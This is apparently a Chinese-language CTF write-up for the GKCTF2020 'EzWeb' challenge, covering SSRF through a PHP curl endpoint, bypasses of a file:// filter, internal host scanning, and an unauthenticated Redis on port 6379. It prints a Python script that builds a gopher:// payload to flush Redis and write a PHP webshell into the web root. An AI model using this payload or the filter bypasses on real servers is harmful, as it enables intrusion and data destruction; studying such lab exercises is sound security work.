[GKCTF2020] EZ三剑客-EzWeb

发布于 2021-08-06  72 次阅读


知识点:

file协议被过滤后可以使用file:/ 和 file:<空格>///

6379端口一般运行redis服务

解题

image-20210117152840344
image-20210117152922826
image-20210117153004242

打开题目,访问输入URL都能正常的访问,但是本地127.0.0.1被ban

image-20210117153126808

发现一个GET传参,尝试传参.

image-20210117153324209
eth0 Link encap:Ethernet HWaddr 02:42:0a:cf:b7:09 
inet addr:10.207.183.9 Bcast:10.207.183.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1
RX packets:57 errors:0 dropped:0 overruns:0 frame:0
TX packets:56 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:10748 (10.7 KB) TX bytes:14359 (14.3 KB)

eth1 Link encap:Ethernet HWaddr 02:42:ac:12:00:2d
inet addr:172.18.0.45 Bcast:172.18.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:26 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:18757 (18.7 KB) TX bytes:908 (908.0 B)

lo Link encap:Local Loopback
inet addr:127.0.0.1
Mask:255.0.0.0 UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:18 errors:0 dropped:0 overruns:0 frame:0
TX packets:18 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1729 (1.7 KB) TX bytes:1729 (1.7 KB)

给了ip地址,10.207.183.9,想到ssrf,结合之前输入url,能够呈现网页内容,尝试使用伪协议读取一下源码

image-20210117155836155
image-20210117155857014
<?php
function curl($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
echo curl_exec($ch);
curl_close($ch);
}

if(isset($_GET['submit'])){
$url = $_GET['url'];
//echo $url."\n";
if(preg_match('/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is', $url,$match))
{
//var_dump($match);
die('别这样');
}
curl($url);
}
if(isset($_GET['secret'])){
system('ifconfig');
}
?>

上面过滤了 file dict : / 127.0.0.1 localhost

结合之前给的ip地址还没有利用上,可以使用http协议跑存活主机地址

image-20210117161058179

发现了一个网页的返回包存在提示,找到了存活主机,下一步就是找到服务端口

image-20210117162345801

发现6379端口出现的提示,查看6379开启的是什么服务

通过百度发现6379一般开启的是redis服务

image-20210117162727551

下一步就应该是百度6379服务存在的漏洞,这里参照其他大佬的wp,发现redis存在未授权访问的漏洞,因为过滤了dict协议,所以使用gopher协议,利用大佬的脚本生成payload:

import urllib
protocol="gopher://"
ip="173.96.119.11" // 运行有redis的主机ip
port="6379"
shell="\n\n\n\n"
filename="shell.php"
path="/var/www/html"
passwd=""
cmd=["flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload=protocol+ip+":"+port+"/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd+=CRLF
return cmd

if __name__=="__main__":
for x in cmd:
payload += urllib.quote(redis_format(x))
print payload
image-20210117165823777
image-20210117165835129

这里脚本进行命令执行可以,但是不能上传一句话木马,问题是啥暂时没有弄清楚